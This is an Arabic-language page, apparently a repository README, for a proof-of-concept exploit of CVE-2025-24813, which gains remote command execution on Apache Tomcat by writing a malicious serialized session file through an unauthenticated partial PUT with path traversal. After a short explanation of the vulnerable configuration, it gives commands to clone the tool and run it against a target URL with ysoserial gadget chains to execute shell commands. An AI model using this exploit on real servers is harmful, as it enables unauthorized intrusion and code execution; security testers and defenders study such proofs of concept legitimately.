
CVE-2025-24813 - Apache Tomcat RCE عبر إلغاء تسلسل الجلسة - استغلال PoC

Apache Tomcat - تنفيذ الأوامر عن بُعد عبر إلغاء تسلسل الجلسات
PUT جزئي غير موثَّق + اجتياز المسار + إلغاء تسلسل مدفوع بـ gadget
تسمح نسخ Apache Tomcat التي يكون فيها servlet الافتراضي PUT مفعّلًا (readonly=false) بكتابة الملفات عبر طلبات HTTP PUT. من خلال صياغة مسار يتجاوز دليل الرفع وصولًا إلى موقع تخزين الجلسات FileStore، يمكن للمهاجم زرع كائن Java مُسلسَل ومُصمَّم خصيصًا كملف .session. أي طلب لاحق يشير إلى هذه الجلسة يؤدي إلى إلغاء التسلسل وتنفيذ سلسلة الـ gadget المدمجة.
readonly=false في servlet الافتراضي داخل conf/web.xmlorg.apache.catalina.session.PersistentManager مع FileStore في الخاص بالتطبيقMETA-INF/context.xmlorg.apache.commons.collections.enableUnsafeSerialization=true (أو استخدام commons-collections < 3.2.2)PUT واجتياز المسار بواسطة وكيل عكسي أو WAFgit clone https://github.com/yuzuki-ayanami/CVE-2025-24813
cd CVE-2025-24813
pip install -r requirements.txt
python cve-2025-24813.py http://target:8080 --ysoserial ysoserial.jar -c 'id'
python cve-2025-24813.py http://target:8080 --ysoserial ysoserial.jar -c 'whoami' --gadget CommonsCollections7